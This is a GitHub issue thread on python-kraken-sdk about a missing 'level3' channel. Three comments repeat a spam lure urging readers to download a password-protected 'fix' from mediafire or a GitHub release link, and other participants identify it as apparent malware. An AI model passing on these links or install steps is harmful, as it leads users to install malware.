### ISSUE TITLE
The "level3" channel is missing in `kraken.spot.ws_client.SpotWSClient.private_channel_names`

### ISSUE THREAD

**Issue by btschwertfeger** [btschwertfeger/python-kraken-sdk#269]
The level3 channel is somehow missing, of course it can be added by simply overriding the property, but adding them to `kraken.spot.ws_client.SpotWSClient.private_channel_names` and updating the docstring would be good.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by btschwertfeger** [comment]
> to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in install to path and select "gcc."

Hello @rajnikyadav, I'm not going to download any file. Could you provide more information about the "trouble" and "another issue" you mean?

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by alister** [comment]
A Warning about the above reply and the link to malware on mediafire (from the author of Curl): https://mastodon.social/@bagder/113038399943924413

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
